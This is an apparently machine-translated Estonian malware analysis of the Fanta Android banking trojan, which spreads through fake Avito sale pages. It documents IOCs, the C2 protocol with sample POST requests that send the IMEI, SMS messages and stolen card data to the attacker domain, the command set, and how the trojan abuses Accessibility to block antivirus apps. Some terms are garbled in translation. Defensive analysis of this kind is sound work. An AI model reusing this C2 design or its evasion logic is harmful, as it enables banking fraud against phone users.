Leisya, Fanta: vana Androidi troojalase uus taktika

Ühel päeval soovite Avitos midagi müüa ja pärast oma toote (näiteks RAM-mooduli) üksikasjaliku kirjelduse postitamist saate järgmise teate:

Kui avate lingi, näete näiliselt kahjutut lehte, mis teavitab teid, õnnelikku ja edukat müüjat, et ost on sooritatud:

Kui klõpsate nupul „Jätka”, laaditakse teie Android-seadmesse alla ikooni ja usaldust inspireeriva nimega APK-fail. Installisid rakenduse, mis millegipärast taotles AccessibilityService'i õigusi, siis tekkis paar akent ja kadus kiiresti ja... See selleks.

Lähed saldot vaatama, aga pangarakendus küsib millegipärast uuesti sinu kaardiandmeid. Pärast andmete sisestamist juhtub midagi kohutavat: mingil teie jaoks veel ebaselgelt põhjusel hakkab teie kontolt raha kaduma. Üritate probleemi lahendada, kuid teie telefon peab vastu: vajutab klahve “Tagasi” ja “Kodu”, ei lülitu välja ega luba turvameetmeid aktiveerida. Selle tulemusena jääte ilma rahata, teie kaup on ostmata, olete segaduses ja mõtlete: mis juhtus?

Vastus on lihtne: teist on saanud Flexneti perekonna liikme Android Trooja Fanta ohver. Kuidas see juhtus? Selgitame nüüd.

Autorid: Andrei Polovinkin, pahavara analüüsi nooremspetsialist, Ivan Pisarev, pahavara analüüsi spetsialist.

Mõned statistika

Androidi troojalaste Flexneti perekond sai esmakordselt tuntuks 2015. aastal. Üsna pika tegevusperioodi jooksul laienes perekond mitmeks alamliigiks: Fanta, Limebot, Lipton jne. Troojalane ja ka sellega seotud infrastruktuur ei seisa paigal: töötatakse välja uusi tõhusaid levitamisskeeme - meie puhul on kvaliteetsed andmepüügilehed, mis on suunatud konkreetsele kasutajale-müüjale, ja Trooja arendajad järgivad moesuundi. viiruste kirjutamine - uute funktsioonide lisamine, mis võimaldab tõhusamalt varastada raha nakatunud seadmetelt ja mööda minna kaitsemehhanismidest.

Selles artiklis kirjeldatud kampaania on suunatud Venemaalt pärit kasutajatele, Ukrainas registreeriti väike arv nakatunud seadmeid, Kasahstanis ja Valgevenes veelgi vähem.

Kuigi Flexnet on Androidi Trooja areenil olnud juba üle 4 aasta ja paljud teadlased on seda põhjalikult uurinud, on see endiselt heas korras. Alates 2019. aasta jaanuarist on potentsiaalne kahjusumma üle 35 miljoni rubla – ja seda ainult Venemaal toimuvate kampaaniate puhul. 2015. aastal müüdi selle Androidi troojalase erinevaid versioone põrandaalustes foorumites, kust võis leida ka trooja lähtekoodi koos üksikasjaliku kirjeldusega. See tähendab, et kahjude statistika maailmas on veelgi muljetavaldavam. Pole paha näitaja nii vana mehe kohta, kas pole?

Müügist petmiseni

Nagu näha varem esitatud Interneti-teenuse Avito reklaamide postitamise andmepüügilehe ekraanipildist, oli see ette valmistatud konkreetse ohvri jaoks. Ilmselt kasutavad ründajad üht Avito parserit, mis võtab välja müüja telefoninumbri ja nime ning tootekirjelduse. Pärast lehe laiendamist ja APK-faili koostamist saadetakse ohvrile SMS tema nime ja lingiga andmepüügilehele, mis sisaldab tema toote kirjeldust ja toote “müügist” saadud summat. Nupule klõpsates saab kasutaja pahatahtliku APK-faili - Fanta.

Domeeni shcet491[.]ru uuring näitas, et see on delegeeritud Hostingeri DNS-serveritele:

• ns1.hostinger.ru
• ns2.hostinger.ru
• ns3.hostinger.ru
• ns4.hostinger.ru

Domeenitsooni fail sisaldab kirjeid, mis osutavad IP-aadressidele 31.220.23[.]236, 31.220.23[.]243 ja 31.220.23[.]235. Domeeni esmase ressursi kirje (A-kirje) osutab aga serverile, mille IP-aadress on 178.132.1[.]240.

IP-aadress 178.132.1[.]240 asub Hollandis ja kuulub hostile WorldStream. IP-aadressid 31.220.23[.]235, 31.220.23[.]236 ja 31.220.23[.]243 asuvad Ühendkuningriigis ja kuuluvad jagatud hostimise serverile HOSTINGER. Kasutatud salvestina openprov-ru. IP-aadressiks 178.132.1[.]240 lahendati ka järgmised domeenid:

• sdelka-ru[.]ru
• tovar-av[.]ru
• av-tovar[.]ru
• ru-sdelka[.]ru
• shcet382[.]ru
• sdelka221[.]ru
• sdelka211[.]ru
• vyplata437[.]ru
• viplata291[.]ru
• perevod273[.]ru
• perevod901[.]ru

Tuleb märkida, et järgmises vormingus lingid olid saadaval peaaegu kõigist domeenidest:

http://(www.){0,1}<%domain%>/[0-9]{7}

See mall sisaldab ka SMS-sõnumi linki. Ajalooliste andmete põhjal leiti, et üks domeen vastab mitmele ülalkirjeldatud mustri lingile, mis viitab sellele, et ühte domeeni kasutati troojalase levitamiseks mitmele ohvrile.

Hüppame veidi edasi: SMS-ist lingi kaudu alla laaditud troojalane kasutab aadressi kontrollserverina onusedseddohap[.]klubi. See domeen registreeriti 2019-03-12 ja alates 2019-04-29 suhtlesid APK rakendused selle domeeniga. VirusTotalist saadud andmete põhjal suhtles selle serveriga kokku 109 rakendust. Domeen ise lahendati IP-aadressiks 217.23.14[.]27, mis asub Hollandis ja kuulub hostijale WorldStream. Kasutatud salvestina nimeavalik. Sellele IP-aadressile lahendati ka domeenid bad-racon[.]klubi (alates 2018-09-25) ja bad-racoon[.]otses (alates 2018-10-25). Domeeniga bad-racon[.]klubi rohkem kui 80 APK-faili, millega suhtles bad-racoon[.]otses - rohkem kui 100.

Üldiselt kulgeb rünnak järgmiselt:

Mis on Fanta kaane all?

Nagu paljud teised Androidi troojalased, on ka Fanta võimeline lugema ja saatma SMS-sõnumeid, tegema USSD-päringuid ning kuvama rakenduste (sh pangarakenduste) peal oma aknaid. Selle perekonna funktsionaalsuse arsenal on aga saabunud: Fanta hakkas kasutama Accessibility Service erinevatel eesmärkidel: teiste rakenduste teadete sisu lugemine, troojalase tuvastamise takistamine ja selle käivitamise peatamine nakatunud seadmes jne. Fanta töötab kõigis Androidi versioonides, mis ei ole nooremad kui 4.4. Selles artiklis vaatleme lähemalt järgmist Fanta näidist:

• MD5: 0826bd11b2c130c4c8ac137e395ac2d4
• SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
• SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Kohe pärast käivitamist

Kohe pärast käivitamist peidab troojalane oma ikooni. Rakendus töötab ainult siis, kui nakatunud seadme nime loendis pole:

• android_x86
• VirtualBox
• Nexus 5X (pullipea)
• Nexus 5 (habemenuga)

See kontroll viiakse läbi Trooja põhiteenuses - Põhiteenus. Esmakordsel käivitamisel lähtestatakse rakenduse konfiguratsiooniparameetrid vaikeväärtustele (konfiguratsiooniandmete salvestamise vormingust ja nende tähendusest räägitakse hiljem) ning uus nakatunud seade registreeritakse juhtserveris. Serverile saadetakse HTTP POST-i päring sõnumitüübiga register_bot ja teave nakatunud seadme kohta (Androidi versioon, IMEI, telefoninumber, operaatori nimi ja riigikood, kus operaator on registreeritud). Aadress toimib juhtserverina hXXp://onuseseddohap[.]club/controller.php. Vastuseks saadab server väljasid sisaldava sõnumi bot_id, bot_pwd, server — rakendus salvestab need väärtused CnC-serveri parameetritena. Parameeter server valikuline, kui välja ei saadud: Fanta kasutab registreerimisaadressi - hXXp://onuseseddohap[.]club/controller.php. CnC aadressi muutmise funktsiooni saab kasutada kahe probleemi lahendamiseks: koormuse jaotamiseks ühtlaselt mitme serveri vahel (suure arvu nakatunud seadmete korral võib optimeerimata veebiserveri koormus olla suur) ning kasutada ka alternatiivi. server ühe CnC-serveri rikke korral.

Kui päringu saatmisel ilmneb tõrge, kordab trooja 20 sekundi pärast registreerimisprotsessi.

Kui seade on edukalt registreeritud, kuvab Fanta kasutajale järgmise teate:

Oluline märkus: teenindus helistas Süsteemi turvalisus — Trooja teenuse nimi ja pärast nupu klõpsamist ОК Avaneb aken nakatunud seadme juurdepääsetavuse sätetega, kus kasutaja peab andma pahatahtlikule teenusele juurdepääsetavuse õigused:

Niipea, kui kasutaja sisse lülitub Accessibility Service, Fanta saab juurdepääsu rakenduste akende sisule ja neis tehtud toimingutele:

Kohe pärast juurdepääsetavuse õiguste saamist taotleb troojalane administraatori õigusi ja õigusi lugeda teatisi:

AccessibilityService'i abil simuleerib rakendus klahvivajutusi, andes seeläbi endale kõik vajalikud õigused.

Fanta loob mitu andmebaasi eksemplari (mida kirjeldatakse hiljem), mis on vajalikud konfiguratsiooniandmete ja nakatunud seadme kohta kogutud teabe salvestamiseks. Kogutud teabe saatmiseks loob troojalane korduva ülesande, mis on mõeldud väljade allalaadimiseks andmebaasist ja käsu vastuvõtmiseks juhtserverist. CnC-le juurdepääsu intervall määratakse sõltuvalt Androidi versioonist: 5.1 puhul on intervall 10 sekundit, muidu 60 sekundit.

Käsu saamiseks teeb Fanta päringu GetTask haldusserverisse. Vastuseks saab CnC saata ühe järgmistest käskudest:

Meeskond	Kirjeldus
0	Saada SMS-sõnum
1	Tehke telefonikõne või USSD käsk
2	Värskendab parameetrit intervall
3	Värskendab parameetrit pealtkuulamiseks
6	Värskendab parameetrit SMS-i haldur
9	Alusta SMS-sõnumite kogumist
11	Lähtestage telefoni tehaseseaded
12	Dialoogiboksi loomise logimise lubamine/keelamine

Fanta kogub teateid ka 70 pangarakendusest, kiirmaksesüsteemidest ja e-rahakotist ning salvestab need andmebaasi.

Konfiguratsiooniparameetrite salvestamine

Konfiguratsiooniparameetrite salvestamiseks kasutab Fanta Androidi platvormi jaoks standardset lähenemisviisi - eelistused- failid. Seadistused salvestatakse faili nimega seaded. Salvestatud parameetrite kirjeldus on allolevas tabelis.

Nimi	Vaikeväärtus	Võimalikud väärtused	Kirjeldus
id	0	Täisarv	Boti ID
server	hXXp://onuseseddohap[.]klubi/	URL	Kontrolli serveri aadressi
pwd	-	nöör	Serveri parool
intervall	20	Täisarv	Ajavahemik. Näitab, kui kauaks tuleks järgmisi ülesandeid edasi lükata: Kui saadate päringu saadetud SMS-sõnumi oleku kohta Uue käsu saamine haldusserverist
pealtkuulamiseks	kõik	kõik/telNumber	Kui väli võrdub stringiga kõik või telNumber, siis võtab rakendus vastuvõetud SMS-sõnumi kinni ja seda kasutajale ei näidata
SMS-i haldur	0	0/1	Lubage/keelake rakendus SMS-i vaikesaajana
lugemisdialoogi	vale	Õige Vale	Sündmuste logimise lubamine/keelamine Accessibility Event

Faili kasutab ka Fanta SMS-i haldur:

Nimi	Vaikeväärtus	Võimalikud väärtused	Kirjeldus
pckg	-	nöör	Kasutatud SMS-sõnumihalduri nimi

Suhtlemine andmebaasidega

Oma töö ajal kasutab trooja kahte andmebaasi. Andmebaas nimega a kasutatakse mitmesuguse telefonist kogutud teabe salvestamiseks. Teine andmebaas kannab nime fanta.db ja seda kasutatakse pangakaartide kohta teabe kogumiseks mõeldud andmepüügiakende loomise eest vastutavate sätete salvestamiseks.

Trooja kasutab andmebaasi а kogutud teabe salvestamiseks ja oma toimingute logimiseks. Andmed salvestatakse tabelisse logisid. Tabeli loomiseks kasutage järgmist SQL-päringut:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

Andmebaas sisaldab järgmist teavet:

1. Nakatunud seadme käivitamise logimine sõnumiga Telefon lülitati sisse!

2. Rakenduste teated. Sõnum genereeritakse järgmise malli järgi:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Trooja loodud andmepüügivormide pangakaardiandmed. Parameeter VIEW_NAME võib olla üks järgmistest:

• AliExpress
• Avito
• Google Play
• Mitmesugust <%Rakenduse nimi%>

Sõnum logitakse vormingus:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Sissetulevad/väljaminevad SMS-sõnumid vormingus:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Teave dialoogiboksi loova paketi kohta järgmises vormingus:

(<%Package name%>)<%Package information%>

Näitetabel logisid:

Fanta üks funktsioone on pangakaartide kohta teabe kogumine. Andmete kogumine toimub pangarakenduste avamisel andmepüügiakende loomise kaudu. Trooja loob andmepüügiakna ainult üks kord. Teave selle kohta, et akent kasutajale näidati, salvestatakse tabelisse seaded andmebaasis fanta.db. Andmebaasi loomiseks kasutage järgmist SQL-päringut:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Kõik tabeli väljad seaded vaikimisi lähtestatud väärtuseks 1 (loo andmepüügiaken). Pärast kasutaja andmete sisestamist määratakse väärtuseks 0. Tabeliväljade näide seaded:

• saab_sisse logida — väli vastutab vormi kuvamise eest pangarakenduse avamisel
• esimene_pank - pole kasutatud
• can_avito — väli vastutab vormi kuvamise eest Avito rakenduse avamisel
• can_ali — väli vastutab vormi kuvamise eest Aliexpressi rakenduse avamisel
• saab_teise — väli vastutab vormi kuvamise eest loendist mis tahes taotluse avamisel: Yula, Pandao, Drom Auto, rahakott. Soodus- ja boonuskaardid, Aviasales, Broneerimine, Trivago
• can_card — väli vastutab vormi kuvamise eest avamisel Google Play

Suhtlemine haldusserveriga

Võrgu suhtlus haldusserveriga toimub HTTP-protokolli kaudu. Võrguga töötamiseks kasutab Fanta populaarset Retrofit raamatukogu. Taotlused saadetakse aadressile: hXXp://onuseseddohap[.]club/controller.php. Serveri aadressi saab muuta serverisse registreerumisel. Küpsiseid võidakse saata vastusena serverilt. Fanta teeb serverile järgmised päringud:

• Boti registreerimine juhtserveris toimub üks kord, esmakordsel käivitamisel. Nakatunud seadme kohta saadetakse serverisse järgmised andmed:
  · küpsis — serverist saadud küpsised (vaikeväärtus on tühi string)
  · režiimis — stringi konstant register_bot
  · eesliide — täisarvuline konstant 2
  · version_sdk — moodustatakse järgmise malli järgi: <%Build.MODEL%>/<%Build.VERSION.RELEASE%> (Avit)
  · imei — nakatunud seadme IMEI
  · riik — selle riigi kood, kus ettevõtja on registreeritud, ISO-vormingus
  · number - telefoninumber
  · operaator — operaatori nimi

  Näide serverile saadetud päringust:

  POST /controller.php HTTP/1.1
  Cookie:
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 144
  Host: onuseseddohap.club
  Connection: close
  Accept-Encoding: gzip, deflate
  User-Agent: okhttp/3.6.0
  
  mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
  

  Vastuseks päringule peab server tagastama JSON-objekti, mis sisaldab järgmisi parameetreid:
  · bot_id — nakatunud seadme ID. Kui bot_id on 0, täidab Fanta päringu uuesti.
  bot_pwd — serveri parool.
  server — kontrolli serveri aadressi. Valikuline parameeter. Kui parameetrit ei täpsustata, kasutatakse rakenduses salvestatud aadressi.

  JSON-objekti näide:

  {
      "response":[
     	 {
     		 "bot_id": <%BOT_ID%>,
     		 "bot_pwd": <%BOT_PWD%>,
     		 "server": <%SERVER%>
     	 }
      ],
      "status":"ok"
  }

• Serverilt käsu saamise taotlus. Serverisse saadetakse järgmised andmed:
  · küpsis — serverist saadud küpsised
  · pakkumine — päringu saatmisel vastu võetud nakatunud seadme ID register_bot
  · pwd - serveri parool
  · divice_admin — väli määrab, kas administraatori õigused on saadud. Kui administraatori õigused on saadud, on väli võrdne väärtusega 1, muidu 0
  · kättesaadavus — juurdepääsetavuse teenuse olek. Kui teenus käivitati, on väärtus 1, muidu 0
  · SMS-i haldur — näitab, kas troojalane on SMS-ide vastuvõtmise vaikerakendusena lubatud
  · ekraan — näitab, millises olekus ekraan on. Väärtus määratakse 1, kui ekraan on sisse lülitatud, muidu 0;

  Näide serverile saadetud päringust:

  POST /controller.php HTTP/1.1
  Cookie:
  Content-Type: application/x-www-form-urlencoded
  Host: onuseseddohap.club
  Connection: close
  Accept-Encoding: gzip, deflate
  User-Agent: okhttp/3.6.0
  
  mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

  Sõltuvalt käsust võib server tagastada JSON-objekti erinevate parameetritega:

  · Meeskond Saada SMS-sõnum: parameetrid sisaldavad telefoninumbrit, SMS-sõnumi teksti ja saadetava sõnumi ID-d. Identifikaatorit kasutatakse serverisse sõnumi saatmisel koos tüübiga setSmsStatus.

  {
      "response":
      [
     	 {
     		 "mode": 0,
     		 "sms_number": <%SMS_NUMBER%>,
     		 "sms_text": <%SMS_TEXT%>,
     		 "sms_id": %SMS_ID%
     	 }
      ],
      "status":"ok"
  }

  · Meeskond Tehke telefonikõne või USSD käsk: telefoninumber või käsk tuleb vastuse kehasse.

  {
      "response":
      [
     	 {
     		 "mode": 1,
     		 "command": <%TEL_NUMBER%>
     	 }
      ],
      "status":"ok"
  }

  · Meeskond Muutke intervalli parameetrit.

  {
      "response":
      [
     	 {
     		 "mode": 2,
     		 "interval": <%SECONDS%>
     	 }
      ],
      "status":"ok"
  }

  · Meeskond Muutke lõikeparameetrit.

  {
      "response":
      [
     	 {
     		 "mode": 3,
     		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
     	 }
      ],
      "status":"ok"
  }

  · Meeskond Muutke SmsManageri välja.

  {
      "response":
      [
     	 {
     		 "mode": 6,
     		 "enable": 0/1
     	 }
      ],
      "status":"ok"
  }

  · Meeskond Koguge nakatunud seadmest SMS-sõnumeid.

  {
      "response":
      [
     	 {
     		 "mode": 9
     	 }
      ],
      "status":"ok"
  }

  · Meeskond Lähtestage telefoni tehaseseaded:

  {
      "response":
      [
     	 {
     		 "mode": 11
     	 }
      ],
      "status":"ok"
  }

  · Meeskond Muutke ReadDialogi parameetrit.

  {
      "response":
      [
     	 {
     		 "mode": 12,
     		 "enable": 0/1
     	 }
      ],
      "status":"ok"
  }

• Sõnumi saatmine tüübiga setSmsStatus. See päring esitatakse pärast käsu täitmist Saada SMS-sõnum. Taotlus näeb välja selline:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

• Andmebaasi sisu üleslaadimine. Päringu kohta edastatakse üks rida. Serverisse saadetakse järgmised andmed:
  · küpsis — serverist saadud küpsised
  · režiimis — stringi konstant setSaveInboxSms
  · pakkumine — päringu saatmisel vastu võetud nakatunud seadme ID register_bot
  · tekst — tekst praeguses andmebaasikirjes (väli d laualt logisid andmebaasis а)
  · number — praeguse andmebaasikirje nimi (väli p laualt logisid andmebaasis а)
  · sms_mode — täisarv (väli m laualt logisid andmebaasis а)

  Taotlus näeb välja selline:

  POST /controller.php HTTP/1.1
  Cookie:
  Content-Type: application/x-www-form-urlencoded
  Host: onuseseddohap.club
  Connection: close
  Accept-Encoding: gzip, deflate
  User-Agent: okhttp/3.6.0
  
  mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

  Kui see on edukalt serverisse saadetud, kustutatakse rida tabelist. Näide serveri poolt tagastatud JSON-objektist:

  {
      "response":[],
      "status":"ok"
  }

AccessibilityService'iga suhtlemine

AccessibilityService rakendati selleks, et muuta Android-seadmed puuetega inimestele hõlpsamini kasutatavaks. Enamikul juhtudel on rakendusega suhtlemiseks vaja füüsilist suhtlust. AccessibilityService võimaldab teil neid programmiliselt teha. Fanta kasutab teenust, et luua pangarakendustes võltsitud aknaid ning takistada kasutajatel süsteemiseadeid ja mõnda rakendust avamast.

AccessibilityService'i funktsionaalsust kasutades jälgib troojalane nakatunud seadme ekraani elementide muudatusi. Nagu eelnevalt kirjeldatud, sisaldavad Fanta sätted parameetrit, mis vastutab dialoogiboksidega logimistoimingute eest - lugemisdialoogi. Kui see parameeter on määratud, lisatakse andmebaasi teave sündmuse käivitanud paketi nime ja kirjelduse kohta. Trooja teeb sündmuste käivitamisel järgmisi toiminguid:

• Simuleerib tagasi- ja koduklahvi vajutamist järgmistel juhtudel:
  · kui kasutaja soovib oma seadet taaskäivitada
  · kui kasutaja soovib Avito rakendust kustutada või juurdepääsuõigusi muuta
  · kui lehel on mainitud rakendust “Avito”.
  · Google Play Protecti rakenduse avamisel
  · AccessibilityService'i seadetega lehtede avamisel
  · kui kuvatakse dialoogiboks System Security
  · kui avate lehe seadetega "Joonista muu rakenduse peale".
  · lehe "Rakendused" avamisel "Taastamine ja lähtestamine", "Andmete lähtestamine", "Lähtesta seaded", "Arendaja paneel", "Eriline. võimalused“, „Erivõimalused“, „Eriõigused“
  · kui sündmuse genereerisid teatud rakendused.

  Rakenduste loend

  • android
  • Master Lite
  • Clean Master
  • Clean Master x86 CPU jaoks
  • Meizu rakenduse lubade haldus
  • MIUI turvalisus
  • Clean Master – viirusetõrje, vahemälu ja prügipuhastaja
  • Vanemlik järelevalve ja GPS: Kaspersky SafeKids
  • Kaspersky Antivirus AppLock & Web Security Beta
  • Virus Cleaner, Antivirus, Cleaner (MAX Security)
  • Mobile AntiVirus Security PRO
  • Avast viirusetõrje ja tasuta kaitse 2019
  • Mobiilne turvalisus MegaFon
  • AVG kaitse Xperia jaoks
  • Mobiilne turvalisus
  • Malwarebytes viirusetõrje ja kaitse
  • Viirusetõrje Android 2019 jaoks
  • Turvameister – viirusetõrje, VPN, AppLock, võimendi
  • AVG viirusetõrje Huawei tahvelarvuti süsteemihaldurile
  • Samsungi juurdepääsetavus
  • Samsung Smart Manager
  • Turvameister
  • Speed ​​Booster
  • Dr.Web
  • Dr.Webi turvaruum
  • Dr.Webi mobiilijuhtimiskeskus
  • Dr.Web Security Space Life
  • Dr.Webi mobiilijuhtimiskeskus
  • Viirusetõrje ja mobiilside turvalisus
  • Kaspersky Internet Security: viirusetõrje ja kaitse
  • Kaspersky aku tööiga: säästja ja võimendus
  • Kaspersky Endpoint Security – kaitse ja haldamine
  • AVG viirusetõrje tasuta 2019 – kaitse Androidile
  • Android Antivirus
  • Norton Mobile Security ja viirusetõrje
  • Viirusetõrje, tulemüür, VPN, mobiiliturvalisus
  • Mobiilne turvalisus: viirusetõrje, VPN, varguskaitse
  • Viirusetõrje Androidile

• Kui lühinumbrile SMS-sõnumi saatmisel küsitakse luba, simuleerib Fanta märkeruudu klõpsamist Pea meeles valik ja nupp saata.
• Kui proovite troojalt administraatoriõigusi ära võtta, lukustab see telefoni ekraani.
• Takistab uute administraatorite lisamist.
• Kui viirusetõrjerakendus dr.web avastas ohu, imiteerib Fanta nupu vajutamist ignoreerida.
• Troojalane simuleerib tagasi- ja kodunuppude vajutamist, kui sündmuse genereeris rakendus Samsungi seadmehooldus.
• Fanta loob andmepüügiaknad koos vormidega pangakaartide teabe sisestamiseks, kui käivitati rakendus loendist, mis sisaldab umbes 30 erinevat Interneti-teenust. Nende hulgas: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto jne.
  

  Andmepüügivormid

  Fanta analüüsib, millised rakendused nakatunud seadmes töötavad. Kui avati huvipakkuv rakendus, kuvab trooja kõigi teiste kohal andmepüügiakna, mis on vorm pangakaardi andmete sisestamiseks. Kasutaja peab sisestama järgmised andmed:

  • Kaardi number
  • Kaardi kehtivusaeg
  • CVV
  • Kaardiomaniku nimi (mitte kõigi pankade jaoks)

  Olenevalt töötavast rakendusest kuvatakse erinevad andmepüügiaknad. Allpool on mõned näited neist:

  AliExpress:

  
  Avito:

  
  Mõnede muude rakenduste jaoks, nt. Google Play turg, Aviasales, Pandao, Broneerimine, Trivago:
  

  Kuidas see tegelikult oli
  

  Õnneks osutus artikli alguses kirjeldatud SMS-i saanud inimene küberjulgeoleku spetsialistiks. Seetõttu erineb tegelik, režissöörita versioon varem räägitust: inimene sai huvitava SMS-i, misjärel ta andis selle grupi IB ohujahi luuremeeskonnale. Rünnaku tulemus on käesolev artikkel. Õnnelik lõpp, eks? Kuid mitte kõik lood ei lõpe nii edukalt ja et teie oma ei näeks välja nagu lavastajalõik koos rahakaotusega, piisab enamasti järgmistest pikalt kirjeldatud reeglitest kinnipidamisest:

  • ärge installige rakendusi Android OS-iga mobiilseadmele muudest allikatest peale Google Play
  • Rakenduse installimisel pöörake erilist tähelepanu rakenduse taotletavatele õigustele
  • pöörake tähelepanu allalaaditud failide laienditele
  • installige regulaarselt Android OS-i värskendusi
  • ära külasta kahtlasi ressursse ega lae sealt faile alla
  • Ärge klõpsake SMS-sõnumitega saadud linke.

Allikas: www.habr.com